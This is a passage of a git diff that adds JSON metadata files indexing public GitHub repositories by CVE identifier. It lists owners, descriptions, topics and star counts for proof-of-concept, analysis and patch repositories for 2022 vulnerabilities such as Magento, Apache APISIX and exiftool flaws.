+ "id": 51371214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51371214?v=4", + "html_url": "https:\/\/github.com\/YouShengLiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YouShengLiu\/CVE-2022-23773-Reproduce", + "description": null, + "fork": false, + "created_at": "2023-03-19T10:08:47Z", + "updated_at": "2023-05-31T07:52:38Z", + "pushed_at": "2023-05-31T07:56:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23779.json b/2022/CVE-2022-23779.json new file mode 100644 index 0000000000..43a45c7e91 --- /dev/null +++ b/2022/CVE-2022-23779.json @@ -0,0 +1,64 @@ +[ + { + "id": 466566861, + "name": "CVE-2022-23779", + "full_name": "fbusr\/CVE-2022-23779", + "owner": { + "login": "fbusr", + "id": 98055920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98055920?v=4", + "html_url": "https:\/\/github.com\/fbusr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbusr\/CVE-2022-23779", + "description": "CVE-2022-23779: Internal Hostname Disclosure Vulnerability", + "fork": false, + "created_at": "2022-03-05T21:01:13Z", + "updated_at": "2022-08-03T10:41:30Z", + "pushed_at": "2022-03-05T21:06:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 528322730, + "name": "Zoho_CVE-2022-23779", + "full_name": "Vulnmachines\/Zoho_CVE-2022-23779", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Zoho_CVE-2022-23779", + "description": "Internal Hostname Disclosure Vulnerability", + "fork": false, + "created_at": "2022-08-24T07:58:45Z", + "updated_at": "2024-08-12T20:26:27Z", + "pushed_at": "2022-09-02T20:06:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23808.json b/2022/CVE-2022-23808.json new file mode 100644 index 0000000000..5395687849 --- /dev/null +++ b/2022/CVE-2022-23808.json @@ -0,0 +1,51 @@ +[ + { + "id": 454474679, + "name": "CVE-2022-23808", + "full_name": "dipakpanchal05\/CVE-2022-23808", + "owner": { + "login": "dipakpanchal05", + "id": 31427462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31427462?v=4", + "html_url": "https:\/\/github.com\/dipakpanchal05", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dipakpanchal05\/CVE-2022-23808", + "description": "phpMyAdmin XSS ", + "fork": false, + "created_at": "2022-02-01T17:02:03Z", + "updated_at": "2024-11-06T19:28:08Z", + "pushed_at": "2024-10-26T13:47:33Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cross-site-scripting", + "database", + "exploit", + "exploitation", + "hacking", + "infosec", + "owasp", + "owasp-top-10", + "pentesting", + "phpmyadmin", + "poc", + "redteam", + "redteaming", + "vulnerability", + "xss", + "zeroday" + ], + "visibility": "public", + "forks": 21, + "watchers": 114, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23812.json b/2022/CVE-2022-23812.json new file mode 100644 index 0000000000..38a92e021a --- /dev/null +++ b/2022/CVE-2022-23812.json @@ -0,0 +1,33 @@ +[ + { + "id": 471066063, + "name": "node-ipc-malware-protestware-CVE-2022-23812", + "full_name": "scriptzteam\/node-ipc-malware-protestware-CVE-2022-23812", + "owner": { + "login": "scriptzteam", + "id": 533180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/533180?v=4", + "html_url": "https:\/\/github.com\/scriptzteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scriptzteam\/node-ipc-malware-protestware-CVE-2022-23812", + "description": "node-ipc is malware \/ protestware!", + "fork": false, + "created_at": "2022-03-17T16:49:22Z", + "updated_at": "2022-03-18T04:02:06Z", + "pushed_at": "2022-03-17T16:49:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23852.json b/2022/CVE-2022-23852.json new file mode 100644 index 0000000000..f34141d445 --- /dev/null +++ b/2022/CVE-2022-23852.json @@ -0,0 +1,33 @@ +[ + { + "id": 490626611, + "name": "external_expat_AOSP10_r33_CVE-2022-23852", + "full_name": "Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-23852", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-23852", + "description": null, + "fork": false, + "created_at": "2022-05-10T09:22:18Z", + "updated_at": "2022-05-10T09:27:14Z", + "pushed_at": "2022-05-10T09:27:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23861.json b/2022/CVE-2022-23861.json new file mode 100644 index 0000000000..5a2be4271c --- /dev/null +++ b/2022/CVE-2022-23861.json @@ -0,0 +1,40 @@ +[ + { + "id": 864892843, + "name": "CVE-2022-23861", + "full_name": "mbadanoiu\/CVE-2022-23861", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-23861", + "description": "CVE-2022-23861: Multiple Stored Cross-Site Scripting in YSoft SafeQ", + "fork": false, + "created_at": "2024-09-29T12:57:38Z", + "updated_at": "2024-09-29T13:19:14Z", + "pushed_at": "2024-09-29T13:13:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2022-23861", + "cves", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23862.json b/2022/CVE-2022-23862.json new file mode 100644 index 0000000000..2dfb929190 --- /dev/null +++ b/2022/CVE-2022-23862.json @@ -0,0 +1,39 @@ +[ + { + "id": 864901218, + "name": "CVE-2022-23862", + "full_name": "mbadanoiu\/CVE-2022-23862", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-23862", + "description": "CVE-2022-23862: Local Privilege Escalation via Unauthenticated JMX in YSoft SafeQ", + "fork": false, + "created_at": "2024-09-29T13:24:40Z", + "updated_at": "2024-09-29T13:40:39Z", + "pushed_at": "2024-09-29T13:36:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-23862", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23884.json b/2022/CVE-2022-23884.json new file mode 100644 index 0000000000..3d61dcc70b --- /dev/null +++ b/2022/CVE-2022-23884.json @@ -0,0 +1,33 @@ +[ + { + "id": 475831213, + "name": "CVE-2022-23884", + "full_name": "nanaao\/CVE-2022-23884", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-23884", + "description": "Details,PoC and patches for CVE-2022-23884", + "fork": false, + "created_at": "2022-03-30T10:36:59Z", + "updated_at": "2023-11-17T11:57:33Z", + "pushed_at": "2022-03-30T10:36:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23909.json b/2022/CVE-2022-23909.json new file mode 100644 index 0000000000..c75d14a9e8 --- /dev/null +++ b/2022/CVE-2022-23909.json @@ -0,0 +1,33 @@ +[ + { + "id": 478637043, + "name": "CVE-2022-23909", + "full_name": "netsectuna\/CVE-2022-23909", + "owner": { + "login": "netsectuna", + "id": 33160392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33160392?v=4", + "html_url": "https:\/\/github.com\/netsectuna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netsectuna\/CVE-2022-23909", + "description": "Unquoted Service Path privilege escalation vulnerability in Sherpa Connector Service. ", + "fork": false, + "created_at": "2022-04-06T16:18:32Z", + "updated_at": "2023-02-04T11:19:38Z", + "pushed_at": "2022-04-06T16:34:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23935.json b/2022/CVE-2022-23935.json new file mode 100644 index 0000000000..0a511743ca --- /dev/null +++ b/2022/CVE-2022-23935.json @@ -0,0 +1,100 @@ +[ + { + "id": 594491558, + "name": "CVE-2022-23935-PoC-Exploit", + "full_name": "dpbe32\/CVE-2022-23935-PoC-Exploit", + "owner": { + "login": "dpbe32", + "id": 93081177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93081177?v=4", + "html_url": "https:\/\/github.com\/dpbe32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit", + "description": "CVE-2022-23935 exploit PoC exiftool version 12.37", + "fork": false, + "created_at": "2023-01-28T18:04:05Z", + "updated_at": "2024-05-31T07:39:02Z", + "pushed_at": "2023-02-21T15:22:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 598604286, + "name": "CVE-2022-23935", + "full_name": "cowsecurity\/CVE-2022-23935", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2022-23935", + "description": "CVE-2022-23935 exploit PoC exiftool version 12.37 written in python", + "fork": false, + "created_at": "2023-02-07T13:02:40Z", + "updated_at": "2024-10-22T14:32:35Z", + "pushed_at": "2023-02-07T13:10:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600164977, + "name": "CVE-2022-23935", + "full_name": "BKreisel\/CVE-2022-23935", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-23935", + "description": "🐍 Python Exploit for CVE-2022-23935", + "fork": false, + "created_at": "2023-02-10T18:22:44Z", + "updated_at": "2023-06-04T19:04:12Z", + "pushed_at": "2023-02-10T21:00:05Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-23935", + "exploit", + "python" + ], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23940.json b/2022/CVE-2022-23940.json new file mode 100644 index 0000000000..e8b851bccc --- /dev/null +++ b/2022/CVE-2022-23940.json @@ -0,0 +1,42 @@ +[ + { + "id": 466801862, + "name": "CVE-2022-23940", + "full_name": "manuelz120\/CVE-2022-23940", + "owner": { + "login": "manuelz120", + "id": 1948316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4", + "html_url": "https:\/\/github.com\/manuelz120", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelz120\/CVE-2022-23940", + "description": "PoC for CVE-2022-23940", + "fork": false, + "created_at": "2022-03-06T17:05:02Z", + "updated_at": "2024-11-20T06:29:49Z", + "pushed_at": "2022-03-11T06:38:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "insecure-deserialization", + "owasp-top-ten", + "python3", + "rce", + "remote-code-execution", + "security", + "suitecrm" + ], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23967.json b/2022/CVE-2022-23967.json new file mode 100644 index 0000000000..a25dbf878a --- /dev/null +++ b/2022/CVE-2022-23967.json @@ -0,0 +1,33 @@ +[ + { + "id": 452399615, + "name": "CVE-2022-23967", + "full_name": "MaherAzzouzi\/CVE-2022-23967", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-23967", + "description": "TightVNC Vulnerability.", + "fork": false, + "created_at": "2022-01-26T18:49:43Z", + "updated_at": "2023-04-05T13:06:51Z", + "pushed_at": "2022-01-26T18:53:03Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23988.json b/2022/CVE-2022-23988.json new file mode 100644 index 0000000000..a30d0e70af --- /dev/null +++ b/2022/CVE-2022-23988.json @@ -0,0 +1,33 @@ +[ + { + "id": 704136393, + "name": "WebSecurityProject", + "full_name": "simonepetruzzi\/WebSecurityProject", + "owner": { + "login": "simonepetruzzi", + "id": 62298351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62298351?v=4", + "html_url": "https:\/\/github.com\/simonepetruzzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simonepetruzzi\/WebSecurityProject", + "description": "Analysis and replication of CVE-2022-23988 and CVE-2022-34265 ", + "fork": false, + "created_at": "2023-10-12T15:58:06Z", + "updated_at": "2023-10-17T00:41:42Z", + "pushed_at": "2023-10-17T15:16:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23990.json b/2022/CVE-2022-23990.json new file mode 100644 index 0000000000..881c8020ab --- /dev/null +++ b/2022/CVE-2022-23990.json @@ -0,0 +1,33 @@ +[ + { + "id": 486460599, + "name": "external_expat_AOSP10_r33_CVE-2022-23990", + "full_name": "Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-23990", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_expat_AOSP10_r33_CVE-2022-23990", + "description": null, + "fork": false, + "created_at": "2022-04-28T05:39:11Z", + "updated_at": "2023-09-15T19:21:13Z", + "pushed_at": "2022-04-28T06:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24086.json b/2022/CVE-2022-24086.json new file mode 100644 index 0000000000..3cecd52880 --- /dev/null +++ b/2022/CVE-2022-24086.json @@ -0,0 +1,291 @@ +[ + { + "id": 461502653, + "name": "CVE-2022-24086", + "full_name": "Mr-xn\/CVE-2022-24086", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-24086", + "description": "CVE-2022-24086 about Magento RCE ", + "fork": false, + "created_at": "2022-02-20T13:52:31Z", + "updated_at": "2024-08-12T20:20:53Z", + "pushed_at": "2022-12-16T16:51:43Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 36, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 464349314, + "name": "CVE-2022-24086-RCE", + "full_name": "nanaao\/CVE-2022-24086-RCE", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-24086-RCE", + "description": "CVE-2022-24086 RCE", + "fork": false, + "created_at": "2022-02-28T05:24:20Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-26T10:29:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 470095423, + "name": "CVE-2022-24086-RCE", + "full_name": "NHPT\/CVE-2022-24086-RCE", + "owner": { + "login": "NHPT", + "id": 42366434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHPT\/CVE-2022-24086-RCE", + "description": null, + "fork": false, + "created_at": "2022-03-15T09:50:02Z", + "updated_at": "2024-08-12T20:21:34Z", + "pushed_at": "2022-03-15T05:15:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 493876946, + "name": "CVE-2022-24086-RCE-PoC", + "full_name": "oK0mo\/CVE-2022-24086-RCE-PoC", + "owner": { + "login": "oK0mo", + "id": 104176829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104176829?v=4", + "html_url": "https:\/\/github.com\/oK0mo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oK0mo\/CVE-2022-24086-RCE-PoC", + "description": "Verifed Proof of Concept on CVE-2022-24086", + "fork": false, + "created_at": "2022-05-19T01:15:57Z", + "updated_at": "2024-08-12T20:23:22Z", + "pushed_at": "2022-08-06T08:33:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 502714109, + "name": "CVE-2022-24086-CVE-2022-24087", + "full_name": "seymanurmutlu\/CVE-2022-24086-CVE-2022-24087", + "owner": { + "login": "seymanurmutlu", + "id": 33136703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33136703?v=4", + "html_url": "https:\/\/github.com\/seymanurmutlu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seymanurmutlu\/CVE-2022-24086-CVE-2022-24087", + "description": null, + "fork": false, + "created_at": "2022-06-12T19:54:16Z", + "updated_at": "2024-08-12T20:24:05Z", + "pushed_at": "2022-06-12T19:57:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 544045744, + "name": "CVE-2022-24086", + "full_name": "akr3ch\/CVE-2022-24086", + "owner": { + "login": "akr3ch", + "id": 97300177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akr3ch\/CVE-2022-24086", + "description": "PoC of CVE-2022-24086", + "fork": false, + "created_at": "2022-10-01T13:53:49Z", + "updated_at": "2024-08-12T20:27:28Z", + "pushed_at": "2022-10-01T13:54:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580408900, + "name": "CVE-2022-24086", + "full_name": "pescepilota\/CVE-2022-24086", + "owner": { + "login": "pescepilota", + "id": 47446178, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47446178?v=4", + "html_url": "https:\/\/github.com\/pescepilota", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pescepilota\/CVE-2022-24086", + "description": "Proof of concept of CVE-2022-24086", + "fork": false, + "created_at": "2022-12-20T13:44:52Z", + "updated_at": "2024-08-12T20:28:57Z", + "pushed_at": "2022-12-20T15:10:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 686707778, + "name": "CVE-2022-24086", + "full_name": "BurpRoot\/CVE-2022-24086", + "owner": { + "login": "BurpRoot", + "id": 54332012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54332012?v=4", + "html_url": "https:\/\/github.com\/BurpRoot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurpRoot\/CVE-2022-24086", + "description": "CVE-2022-24086 POC example", + "fork": false, + "created_at": "2023-09-03T17:27:58Z", + "updated_at": "2023-09-03T17:27:58Z", + "pushed_at": "2023-09-03T17:34:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893761573, + "name": "magento2-template-filter-patch", + "full_name": "wubinworks\/magento2-template-filter-patch", + "owner": { + "login": "wubinworks", + "id": 127310257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127310257?v=4", + "html_url": "https:\/\/github.com\/wubinworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wubinworks\/magento2-template-filter-patch", + "description": "Magento 2 patch for CVE-2022-24086. Fix the RCE vulnerability and related bugs by performing deep template variable escaping. If you cannot upgrade Magento or cannot apply the official patches, try this one.", + "fork": false, + "created_at": "2024-11-25T06:56:05Z", + "updated_at": "2024-11-27T04:14:24Z", + "pushed_at": "2024-11-25T09:38:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "all-magento24-compatible", + "cve-2022-24086", + "deep-escape", + "improper-input-validation", + "legacyresolver", + "magento2", + "patch", + "rce", + "template-filter" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24087.json b/2022/CVE-2022-24087.json new file mode 100644 index 0000000000..af1e68dfc1 --- /dev/null +++ b/2022/CVE-2022-24087.json @@ -0,0 +1,33 @@ +[ + { + "id": 481681813, + "name": "CVE-2022-24087", + "full_name": "Neimar47574\/CVE-2022-24087", + "owner": { + "login": "Neimar47574", + "id": 103583589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103583589?v=4", + "html_url": "https:\/\/github.com\/Neimar47574", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neimar47574\/CVE-2022-24087", + "description": null, + "fork": false, + "created_at": "2022-04-14T16:56:08Z", + "updated_at": "2022-08-06T04:46:09Z", + "pushed_at": "2022-04-16T11:02:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24112.json b/2022/CVE-2022-24112.json new file mode 100644 index 0000000000..b2eb2e78cf --- /dev/null +++ b/2022/CVE-2022-24112.json @@ -0,0 +1,286 @@ +[ + { + "id": 462326409, + "name": "CVE-2022-24112", + "full_name": "Mr-xn\/CVE-2022-24112", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-24112", + "description": "CVE-2022-24112:Apache APISIX apisix\/batch-requests RCE", + "fork": false, + "created_at": "2022-02-22T14:09:49Z", + "updated_at": "2024-08-12T20:20:55Z", + "pushed_at": "2022-02-22T15:42:39Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 462508832, + "name": "CVE-2022-24112", + "full_name": "CrackerCat\/CVE-2022-24112", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2022-24112", + "description": "Apache APISIX apisix\/batch-requests RCE", + "fork": false, + "created_at": "2022-02-22T23:21:26Z", + "updated_at": "2022-02-22T20:31:08Z", + "pushed_at": "2022-02-22T19:05:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 463579186, + "name": "CVE-2022-24112", + "full_name": "Axx8\/CVE-2022-24112", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/CVE-2022-24112", + "description": "Apache APISIX batch-requests RCE(CVE-2022-24112)", + "fork": false, + "created_at": "2022-02-25T15:17:28Z", + "updated_at": "2024-11-06T23:16:14Z", + "pushed_at": "2022-02-25T15:30:08Z", + "stargazers_count": 8, + "watchers_count": 